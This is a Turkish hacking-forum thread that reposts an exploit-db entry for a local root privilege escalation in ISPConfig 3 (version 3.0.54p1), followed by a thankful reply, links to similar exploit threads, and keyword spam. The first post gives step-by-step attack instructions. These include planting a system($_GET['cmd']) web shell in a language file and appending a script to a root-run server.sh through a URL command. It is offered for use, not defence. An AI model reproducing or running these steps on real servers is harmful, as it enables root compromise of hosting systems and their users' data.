Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
ISPConfig 3 authenticated admin Localroot Açığı
#1
Kod:
# Exploit Title: ISPConfig 3 authenticated admin Localroot vulnerability
# Date: 7/25/14
# Exploit Author: mra
# Vendor Homepage: http://wwwispconfig.org
# Version: 3.0.54p1
# Tested on: ubuntu, centos
# irc.criten.net #elite-chat


While logged in as admin user:


1) add a shell user

2) under option set gid to ispconfig

3) log in as that user

4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);


5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/34241/
www.deccal.org


Beğenenler:
#2
eline saglık seni tutana ask olsun
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Developed By IT Look Admin Sayfası Atlatma Açığı KingSkrupellos 10 165 8 saat önce
Son Yorum: 404 hack
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 6 125 Dün, Saat: 22:56
Son Yorum: GECEGEZEN
  MyBB Forum usercp.php?action=avatar Açığı KingSkrupellos 233 12,029 Dün, Saat: 14:55
Son Yorum: Trajedi
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 12 231 08-12-2016, Saat: 20:37
Son Yorum: _Golge
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 200 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
Anahtar Kelimeler

ISPConfig 3 authenticated admin Localroot Açığı indir, ISPConfig 3 authenticated admin Localroot Açığı Videosu, ISPConfig 3 authenticated admin Localroot Açığı Online izle, ISPConfig 3 authenticated admin Localroot Açığı Bedava indir, ISPConfig 3 authenticated admin Localroot Açığı Yükle, ISPConfig 3 authenticated admin Localroot Açığı Hakkında, ISPConfig 3 authenticated admin Localroot Açığı Nedir, ISPConfig 3 authenticated admin Localroot Açığı Free indir, ISPConfig 3 authenticated admin Localroot Açığı Oyunu, ISPConfig 3 authenticated admin Localroot Açığı Download


1 Ziyaretçi